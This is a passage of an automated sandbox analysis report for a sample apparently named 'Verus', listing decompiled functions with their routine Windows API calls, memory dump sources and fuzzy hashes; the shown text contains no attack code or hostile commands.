Instruction Fuzzy Hash: C3216D71204702ABE320DF65CC8AF6BB7E8ABC8B00F04891DB655876C1D778F808CB65

Function 0046E260 Relevance: 6.1, APIs: 4, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrcmpW.KERNEL32(?,?,?,00000000,?,-00000001,00000000,0045B390,00000010,AD5E0258,?,00000000,?,00000004), ref: 0046E296

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrcmp
String ID:
API String ID: 1534048567-0
Opcode ID: 94d182df8d14f715fafd03007579b433d37b522f19e66bbfb0332b9f678fe04b
Instruction ID: 698d487b37af5c9043fb28b915c88ba2ae1474baac85c7689a1c1dc775d12c85
Opcode Fuzzy Hash: 94d182df8d14f715fafd03007579b433d37b522f19e66bbfb0332b9f678fe04b
Instruction Fuzzy Hash: B311E4BA0002219BE740EF29C8A5CF7B7E9FFD4300F44889AF8D147261E235D459CBA2

Function 004BCF80 Relevance: 6.1, APIs: 4, Instructions: 65timeCOMMON

Download Yara Rule

APIs

GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 004BCF9C
FileTimeToSystemTime.KERNEL32(?,?), ref: 004BCFB2

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: FileTime$AttributesSystem
String ID:
API String ID: 3681139894-0
Opcode ID: 7102227468850b5cab0b94379056cd0ee2246e80761e263eea83dc0a15605cd7
Instruction ID: fd9decdcc4da000575e6b1bcc7702c4cef87b964abc7b58be6fceb262dfb4cb7
Opcode Fuzzy Hash: 7102227468850b5cab0b94379056cd0ee2246e80761e263eea83dc0a15605cd7
Instruction Fuzzy Hash: 47119072900208A7CF00EFE1DD85DFF737DAA58304B00495AF50297140FB39E60A9779

Function 004466B0 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 004466C5
SendMessageW.USER32 ref: 0044672F
SendMessageW.USER32(?,0000102B,00000000,?), ref: 00446741
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0044674E

Part of subcall function 00465BA0: FindWindowExW.USER32(?,00000000,SysListView32,00000000), ref: 00465BBE
Part of subcall function 00465BA0: IsWindowVisible.USER32(00000000), ref: 00465BC3
Part of subcall function 00465BA0: FindWindowExW.USER32(?,00000000,ThumbnailVwExtWnd32,00000000), ref: 00465BD8
Part of subcall function 00465BA0: FindWindowExW.USER32(00000000,00000000,SysListView32,00000000), ref: 00465BE4

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Window$FindMessageSend$FocusVisible
String ID:
API String ID: 4150642205-0
Opcode ID: 349b9edc394caacbead9ce609358c7ea46a5e6e73990cfed54e38b43a34007b2
Instruction ID: 799dcdbef7a6b04f91e79ca732acd121b59f4f758c97dc0088e547186ae8c7eb
Opcode Fuzzy Hash: 349b9edc394caacbead9ce609358c7ea46a5e6e73990cfed54e38b43a34007b2
Instruction Fuzzy Hash: 76118C71504310AFE360DF398C80B9BBAE4EBCD764F11082EF588E7240E674D941CB9A

Function 004621E0 Relevance: 6.0, APIs: 4, Instructions: 49windowCOMMON

Download Yara Rule

APIs

ScreenToClient.USER32(?,?), ref: 00462202
SendMessageW.USER32(?,00001111,00000000,?), ref: 00462220
SendMessageW.USER32(?,0000110B,00000008,00000000), ref: 00462234
SendMessageW.USER32(?,0000110B,00000008,00000000), ref: 0046224F

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$ClientScreen
String ID:
API String ID: 1264711397-0
Opcode ID: 06afe9aeb5b5bcb0b23e9e6a0cdfc764e999a4610a95f9aa01e7336120fd0b46
Instruction ID: 2934229b941685875600461ea4d38104d15699441dc3019387ac75ff6d8bf2ce
Opcode Fuzzy Hash: 06afe9aeb5b5bcb0b23e9e6a0cdfc764e999a4610a95f9aa01e7336120fd0b46
Instruction Fuzzy Hash: 68014CB9244700AFD364EF68DC91EA7B3B4BBC8700F00895DFA959B390D670E8098B65

Function 00442780 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000011), ref: 0044279C
_memset.LIBCMT ref: 004427B0
GetObjectW.GDI32(?,0000005C,?), ref: 004427C0
CreateFontIndirectW.GDI32 ref: 004427D8

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Object$CreateFontIndirectStock_memset
String ID:
API String ID: 1064234985-0
Opcode ID: 920d1b118e23d1cd6d329dd3be287372476ef5d50ecac34a6b39186be7242d75
Instruction ID: 98a095d9674d64371812a8308b3aa781576aa9819e9d09b42340dcbc7fb28739
Opcode Fuzzy Hash: 920d1b118e23d1cd6d329dd3be287372476ef5d50ecac34a6b39186be7242d75
Instruction Fuzzy Hash: 6D01D476600300AFE700DB19EC429AF7BE4FBC8710F80092EF655C3290E77488488B97

Function 00421240 Relevance: 6.0, APIs: 4, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00421247
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00421265
SendMessageW.USER32(?,00000401,00000086,00000001), ref: 0042127B
SendMessageW.USER32(?,00000401,00000086,00000000), ref: 0042129E

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Window
String ID:
API String ID: 2326795674-0
Opcode ID: 682e3da67b588f232ec78124ce7aef58fadd03de370a2df4fca24024ad7b41e5
Instruction ID: 4ffa6a263039ddee00af6123bd91f42a98060a9ca182a52ae34c974177aa9460
Opcode Fuzzy Hash: 682e3da67b588f232ec78124ce7aef58fadd03de370a2df4fca24024ad7b41e5
Instruction Fuzzy Hash: 7501F472354310ABE360DBA9ED41F87B3D9ABD4B00F01491AF240EB2E4CAF5E8418B64

Function 0044C180 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000401,?,?), ref: 0044C1A7
SendMessageW.USER32(?,00000402,?), ref: 0044C1BA
SendMessageW.USER32(?,00000405,?), ref: 0044C1CD
SendMessageW.USER32(?,00000403,?,00000000), ref: 0044C1E0

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a4418f6297129e108d1a297b2a54fc97bbe3aa9bff89e6691c7193c11555ac1d
Instruction ID: af3fc77a1b6075a4bec3c6e3ff45bb1dc278b211ea07712f2b2d377a6a901ff1
Opcode Fuzzy Hash: a4418f6297129e108d1a297b2a54fc97bbe3aa9bff89e6691c7193c11555ac1d
Instruction Fuzzy Hash: 28F09AE21223143AD1108A1A9C82D37B7EEEBC5F02B04981DF381A2081D9B9E801C238

Function 00452130 Relevance: 6.0, APIs: 4, Instructions: 44windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0045215A
GetFocus.USER32 ref: 00452170
SetFocus.USER32(?), ref: 0045217C
SendMessageW.USER32(?,00000419,?,00000000), ref: 00452191

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Focus$MessageSend
String ID:
API String ID: 733279069-0
Opcode ID: b11e5c87e1115833a76cdaf4fe3099f96551c2c98702221868a64632b033d72a
Instruction ID: b3e92be543fc13b6bfaa9125cd1a55a990f92ce370691654f482baf67eb5bb41
Opcode Fuzzy Hash: b11e5c87e1115833a76cdaf4fe3099f96551c2c98702221868a64632b033d72a
Instruction Fuzzy Hash: FC018F32200B00AFD320DB68DA84F4BB7E8ABD5711F15881FE699C7291C7B4B8458B69

Function 0044CAC9 Relevance: 6.0, APIs: 4, Instructions: 44windowCOMMON

Download Yara Rule

APIs

AppendMenuW.USER32(?,00000000,?,004C49AC), ref: 0044CAFF
GetMenuItemCount.USER32(?), ref: 0044CB1F
DestroyMenu.USER32(?), ref: 0044CB2E
MessageBeep.USER32(000000FF), ref: 0044CB36

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Menu$AppendBeepCountDestroyItemMessage
String ID:
API String ID: 2140182801-0
Opcode ID: 14df7ba4c81562e715c6f929b1d2bdd6b426b5ed9fb776b621be1271b854f678
Instruction ID: b8c121661c5f27563b6dadb232c79a4731d887644e830c2b28c9438b557249fb
Opcode Fuzzy Hash: 14df7ba4c81562e715c6f929b1d2bdd6b426b5ed9fb776b621be1271b854f678
Instruction Fuzzy Hash: CA0147326063419BEBA4CB20F899B7FB3A4FFC4350F080A2EE55253250D7382844C79E

Function 004482B0 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 004482E8
EnterCriticalSection.KERNEL32(-00000010), ref: 00448301
LoadCursorW.USER32(00000000,00007F85), ref: 00448315
LeaveCriticalSection.KERNEL32(-00000010), ref: 00448321

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: CriticalSection$CursorEmptyEnterLeaveLoadRect
String ID:
API String ID: 923616367-0
Opcode ID: a6ae294975f1bc62f8e124c6fe9d74fcd9971f10edf347d7e36351b8c1a567cb
Instruction ID: d7e28e7c038c64b063b1b329017c2a83e2a5ff54505803ff79ebd52d7089e206
Opcode Fuzzy Hash: a6ae294975f1bc62f8e124c6fe9d74fcd9971f10edf347d7e36351b8c1a567cb
Instruction Fuzzy Hash: C001E5B1905B40CFD3658F2AA984857FBF8FFA87113508A2FF48A82B61C774A445CF58

Function 00448330 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 00448368
EnterCriticalSection.KERNEL32(-00000010), ref: 00448381
LoadCursorW.USER32(00000000,00007F84), ref: 00448395
LeaveCriticalSection.KERNEL32(-00000010), ref: 004483A1

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: CriticalSection$CursorEmptyEnterLeaveLoadRect
String ID:
API String ID: 923616367-0
Opcode ID: 9c287dac656320e295d8e9fc53fc9950018429e60a536efb785329de2c96fb61
Instruction ID: bf6129b0d542ec462a5f533dbf2d949d2f89802fc9cbb4c607a019955d59bde6
Opcode Fuzzy Hash: 9c287dac656320e295d8e9fc53fc9950018429e60a536efb785329de2c96fb61
Instruction Fuzzy Hash: 8B01D7B1905B418FD3658F2AE980456FAF8FFA47153504A2FE49A82B61C7B0A440CB58

Function 00424200 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 00424236
FlushInstructionCache.KERNEL32(00000000), ref: 0042423D
CreateDialogParamW.USER32(?,000000D2,000000E9,Function_000166E0,?), ref: 0042426D

Part of subcall function 00490CEC: GetProcessHeap.KERNEL32(00000000,0000000D,?,00415D3E), ref: 00490C6D
Part of subcall function 00490CEC: HeapAlloc.KERNEL32(00000000,?,00415D3E), ref: 00490C74

SetLastError.KERNEL32(0000000E), ref: 00424279

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: HeapProcess$AllocCacheCreateCurrentDialogErrorFlushInstructionLastParam
String ID:
API String ID: 3830230333-0
Opcode ID: 2afc671b683d3377a203c8983570175d355c69faeb68cfec96eefce22f73aeed
Instruction ID: 9c742d8b88a12b10f4f67d6aa0f846ab9a78dcdce7feaaec93c3e28c268552b9
Opcode Fuzzy Hash: 2afc671b683d3377a203c8983570175d355c69faeb68cfec96eefce22f73aeed
Instruction Fuzzy Hash: 94018B71204310AFD320AFB4ED19F5B7BA8EF95751F028AAAB4859B2E0C674D840C779

Function 0045E600 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 0045E636
FlushInstructionCache.KERNEL32(00000000), ref: 0045E63D
DialogBoxParamW.USER32(?,000000DA,000000E9,Function_000166E0,?), ref: 0045E66D

Part of subcall function 00490CEC: GetProcessHeap.KERNEL32(00000000,0000000D,?,00415D3E), ref: 00490C6D
Part of subcall function 00490CEC: HeapAlloc.KERNEL32(00000000,?,00415D3E), ref: 00490C74

SetLastError.KERNEL32(0000000E), ref: 0045E679

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: HeapProcess$AllocCacheCurrentDialogErrorFlushInstructionLastParam
String ID:
API String ID: 2519808469-0
Opcode ID: 0601963e0fe5bb79d6b140aa156eeb3cf68e277394d0824080de51f420a29561
Instruction ID: 140a4c3b760d4e6ac258c18a19f6ce20c626c5979ce98a2a4ca9716b354610b8
Opcode Fuzzy Hash: 0601963e0fe5bb79d6b140aa156eeb3cf68e277394d0824080de51f420a29561
Instruction Fuzzy Hash: D301DF31200300AFD324AF74ED09F5B7BA8AF91762F018B5AB4958B2E0C774D840C775

Function 0041C630 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 0041C666
FlushInstructionCache.KERNEL32(00000000), ref: 0041C66D
DialogBoxParamW.USER32(?,000000E7,000000E9,Function_000166E0,?), ref: 0041C69D

Part of subcall function 00490CEC: GetProcessHeap.KERNEL32(00000000,0000000D,?,00415D3E), ref: 00490C6D
Part of subcall function 00490CEC: HeapAlloc.KERNEL32(00000000,?,00415D3E), ref: 00490C74

SetLastError.KERNEL32(0000000E), ref: 0041C6A9

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: HeapProcess$AllocCacheCurrentDialogErrorFlushInstructionLastParam
String ID:
API String ID: 2519808469-0
Opcode ID: 94c82b555b02c02fccf84c17a815ac35f0766a3d6d0ad6e3e292c6e45fd72af2
Instruction ID: dfa37687bbc2d94e6d17dceb2fb53e34100087de186a97e4757458fa866bab3a
Opcode Fuzzy Hash: 94c82b555b02c02fccf84c17a815ac35f0766a3d6d0ad6e3e292c6e45fd72af2
Instruction Fuzzy Hash: 76018F71244300AFD360AF78ED19F9B7BA8AF81725F018B5AB4959B2E0C774D840C775

Function 004167A0 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 004167D6
FlushInstructionCache.KERNEL32(00000000), ref: 004167DD
DialogBoxParamW.USER32(?,000000DC,000000E9,Function_000166E0,?), ref: 0041680D

Part of subcall function 00490CEC: GetProcessHeap.KERNEL32(00000000,0000000D,?,00415D3E), ref: 00490C6D
Part of subcall function 00490CEC: HeapAlloc.KERNEL32(00000000,?,00415D3E), ref: 00490C74

SetLastError.KERNEL32(0000000E), ref: 00416819

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
